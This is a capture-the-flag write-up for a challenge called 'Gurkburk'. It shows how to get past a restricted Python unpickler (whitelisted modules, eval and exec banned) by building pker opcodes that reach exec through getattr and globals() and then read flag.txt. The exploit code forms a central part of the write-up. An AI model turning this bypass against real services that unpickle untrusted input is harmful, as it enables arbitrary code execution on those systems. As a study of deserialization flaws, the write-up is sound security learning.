# Gurkburk

## Problem

The flag is located in `./flag.txt`.

## Solution

Pickle is used to save and load notes into the application.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-00cfd7b3e50ba632f7647d37cd7f4cc9e7e1a2b0%2Fb83bd3862fc8415a9a08fa222b4fbd00.png?alt=media)

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-5e20b73fa72c703ac717d174fe484f7bc5e64670%2F06f07bd072064fb4a8827f6db569c53a.png?alt=media)

Normally, we would be able to use the `__reduce__()` method to make the program call functions like `os.system()` (see <https://davidhamann.de/2020/04/05/exploiting-python-pickle/>).

See <https://docs.python.org/3.7/library/pickle.html#restricting-globals>. The modules we can unpickle are restricted to `__main__`, `__builtin__` and `copyreg`. `eval` and `exec` are also banned.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-2331847cac3d3cb272875a4d86ffdc6bc736bc01%2Fa67175be4b3d4d13a97580a116bf2716.png?alt=media)

Thanks to <https://translate.google.com/translate?hl=en&sl=zh-CN&u=https://xz.aliyun.com/t/7436&prev=search>, I found a way to bypass the restrictions.

They created an API to generate Pickle opcodes: <https://github.com/EddieIvan01/pker> (I made some slight modifications)

Exploit code:

```python
getattr = GLOBAL ( '__builtin__' , 'getattr' ) 
dict = GLOBAL ( '__builtin__' , 'dict' ) 
dict_get = getattr ( dict , 'get' ) 
glo_dic = GLOBAL ( '__builtin__' , 'globals' )() 
builtins = dict_get ( glo_dic , '__builtins__' ) 
exec = getattr ( builtins , 'exec' )
exec ("print(open('flag.txt', 'r').read())") 
return
```

The idea is that using `getattr`, we can get *submodules* of `__builtin__` (and the submodules of the submodules). `__builtin__.globals()` includes `builtins`, which includes `exec`. Once we have control over `exec`, we can execute arbitrary code.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-b3e769e45a6f21bc8ddcb1d34dd2258f73e83a3a%2F7b67c03c11e5447f8e7b010512a8ccac.png?alt=media)

Submit the base64-encoded opcodes, and we obtain the flags.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-1ae5501523df86097e1b1bb8d562f159cfaf97e7%2F5cefd07e73384b6493eab4f5c7c5f4a4.png?alt=media)

## References

1. <https://davidhamann.de/2020/04/05/exploiting-python-pickle/>
2. <https://translate.google.com/translate?hl=en&sl=zh-CN&u=https://xz.aliyun.com/t/7436&prev=search>
3. <https://github.com/EddieIvan01/pker>